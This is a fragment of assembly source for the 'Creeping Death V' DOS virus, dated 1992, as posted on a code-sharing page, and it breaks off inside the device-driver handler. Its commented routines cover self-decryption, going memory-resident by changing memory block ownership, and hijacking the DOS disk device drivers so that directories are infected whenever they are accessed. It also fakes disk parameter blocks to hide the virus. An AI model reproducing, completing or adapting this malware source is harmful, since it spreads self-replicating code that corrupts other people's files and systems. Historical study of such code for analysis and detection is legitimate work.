📄 cdeath5.asm
字号:
;*****************************************************************************;
; ;
; Creeping Death V (Encrypting, try to find it) ;
; (Version 4 bug Fixed) :
; (c) Copyright 1992 by Bit Addict ;
; ;
;*****************************************************************************;
code segment public 'code'
assume cs:code, ds:code, es:code
org 5ch
;*****************************************************************************;
; ;
; Data ;
; ;
;*****************************************************************************;
BPB_Buf: db 32 dup(?) ; buffer for BPB
EncryptWrite2: db 36 dup(?) ; Encrypt DoRequest Encrypt
Request equ this dword ; address of the request header
RequestOffset dw ?
RequestSegment dw ?
org 100h
;*****************************************************************************;
; ;
; Actual start of virus. In this part the virus initializes the stack and ;
; adjusts the device driver used by dos to read and write from floppy's and ;
; hard disks. Then it will start the orginal exe or com-file ;
; ;
;*****************************************************************************;
Encrypt: mov si,offset Main-1
mov cx,400h-11
Repeat: xor byte ptr [si],0
inc si
loop Repeat
Main: mov sp,600h ; init stack
inc Counter
;*****************************************************************************;
; ;
; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ;
; si will be -1 ;
; ;
;*****************************************************************************;
DosVersion: mov ah,30h ; fn 30h = Get Dosversion
int 21h ; int 21h
cmp al,4 ; major dosversion
sbb di,di
mov byte ptr ds:drive[2],-1 ; set 2nd operand of cmp ah,??
;*****************************************************************************;
; ;
; Adjust the size of the codesegment, with dos function 4ah ;
; ;
;*****************************************************************************;
mov bx,60h ; Adjust size of memory block
mov ah,4ah ; to 60 paragraphs = 600h bytes
int 21h ; int 21h
mov ah,52h ; get internal list of lists
int 21h ; int 21h
;*****************************************************************************;
; ;
; If the virus code segment is located behind the dos config memory block the ;
; code segment will be part of the config memory block making it 61h ;
; paragraphs larger. If the virus is not located next to the config memory ;
; block the virus will set the owner to 8h (Dos system) ;
; ;
;*****************************************************************************;
mov ax,es:[bx-2] ; segment of first MCB
mov dx,cs ; dx = MCB of the code segment
dec dx
NextMCB: mov ds,ax ; ax = segment next MCB
add ax,ds:[3]
inc ax
cmp ax,dx ; are they equal ?
jne NextMCB ; no, not 1st program executed
cmp word ptr ds:[1],8
jne NoBoot
add word ptr ds:[3],61h ; add 61h to size of block
NoBoot: mov ds,dx ; ds = segment of MCB
mov word ptr ds:[1],8 ; owner = dos system
;*****************************************************************************;
; ;
; The virus will search for the disk paramenter block for drive a: - c: in ;
; order to find the device driver for these block devices. If any of these ;
; blocks is found the virus will install its own device driver and set the ;
; access flag to -1 to tell dos this device hasn't been accesed yet. ;
; ;
;*****************************************************************************;
cld ; clear direction flag
lds bx,es:[bx] ; get pointer to first drive
; paramenter block
Search: cmp bx,-1 ; last block ?
je Last
mov ax,ds:[bx+di+15h] ; get segment of device header
cmp ax,70h ; dos device header ??
jne Next ; no, go to next device
xchg ax,cx
mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive
; has not been accessed"
mov si,offset Header-4 ; set address of new device
xchg si,ds:[bx+di+13h] ; and save old address
mov ds:[bx+di+15h],cs
Next: lds bx,ds:[bx+di+19h] ; next drive parameter block
jmp Search
;*****************************************************************************;
; ;
; If the virus has failed in starting the orginal exe-file it will jump here. ;
; ;
;*****************************************************************************;
Boot: mov ds,ds:[16h] ; es = parent PSP
mov bx,ds:[16h] ; bx = parent PSP of Parent PSP
xor si,si
sub bx,1
jnb Exec
mov ax,cs
dec ax
mov ds,ax
mov cx,8
mov si,8
mov di,0ffh
Count: lodsb
or al,al
loopne Count
not cx
and cx,7
NextByte: mov si,8
inc di
push di
push cx
rep cmpsb
pop cx
pop di
jne NextByte
BeginName: dec di
cmp byte ptr es:[di-1],0
jne BeginName
mov si,di
mov bx,es
jmp short Exec
;*****************************************************************************;
; ;
; If none of these devices is found it means the virus is already resident ;
; and the virus wasn't able to start the orginal exe-file (the file is ;
; corrupted by copying it without the virus memory resident). If the device ;
; is found the information in the header is copied. ;
; ;
;*****************************************************************************;
Last: jcxz Exit
;*****************************************************************************;
; ;
; The information about the dos device driver is copyed to the virus code ;
; segment ;
; ;
;*****************************************************************************;
mov ds,cx ; ds = segment of Device Driver
add si,4
push cs
pop es
mov di,offset Header
movsw
lodsw
mov es:StrBlock,ax
mov ax,offset Strategy
stosw
lodsw
mov es:IntBlock,ax
mov ax,offset Interrupt
stosw
movsb
;*****************************************************************************;
; ;
; Deallocate the environment memory block and start the this file again, but ;
; if the virus succeeds it will start the orginal exe-file. ;
; ;
;*****************************************************************************;
push cs
pop ds
mov bx,ds:[2ch] ; environment segment
or bx,bx ; =0 ?
jz Boot
mov es,bx
mov ah,49h ; deallocate memory
int 21h
xor ax,ax
mov di,1
Seek: dec di ; scan for end of environment
scasw
jne Seek
lea si,ds:[di+2] ; es:si = start of filename
Exec: push bx
push cs
pop ds
mov bx,offset Param
mov ds:[bx+4],cs ; set segments in EPB
mov ds:[bx+8],cs
mov ds:[bx+12],cs
pop ds
push cs
pop es
mov di,offset f_name ; copy name of this file
push di
mov cx,40
rep movsw
push cs
pop ds
mov ah,3dh ; open file, this file will
mov dx,offset File ; not be found but the entire
int 21h ; directory is searched and
pop dx ; infected
mov ax,4b00h ; execute file
int 21h
Exit: mov ah,4dh ; get exit-code
int 21h
mov ah,4ch ; terminate (al = exit code)
int 21h
;*****************************************************************************;
; ;
; Installation complete ;
; ;
;*****************************************************************************;
; ;
; The next part contains the device driver used by creeping death to infect ;
; directory's ;
; ;
; The device driver uses only the strategy routine to handle the requests. ;
; I don't know if this is because the virus will work better or the writer ;
; of this virus didn't know how to do it right. ;
; ;
;*****************************************************************************;
Strategy: mov cs:RequestOffset,bx
mov cs:RequestSegment,es
retf
Interrupt: push ax ; driver strategy block
push bx
push cx ; save registers
push dx
push si
push di
push ds
push es
les bx,cs:Request
push es
pop ds
mov al,ds:[bx+2] ; Command Code
cmp al,4 ; Input
je Input
cmp al,8 ; Output
je Output
cmp al,9
je Output
call DoRequest
cmp al,2 ; Build BPB
jne Return
lds si,ds:[bx+12h] ; copy the BPB and change it
mov di,offset bpb_buf ; into one that hides the virus
mov es:[bx+12h],di
mov es:[bx+14h],cs
push es ; copy
push cs
pop es
mov cx,16
rep movsw
pop es
push cs
pop ds
mov al,ds:[di+2-32] ; change
cmp al,2
adc al,0
cbw
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -